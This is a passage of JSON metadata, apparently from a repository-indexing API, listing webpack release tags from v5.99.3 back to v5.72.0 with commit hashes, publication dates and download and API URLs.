null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manif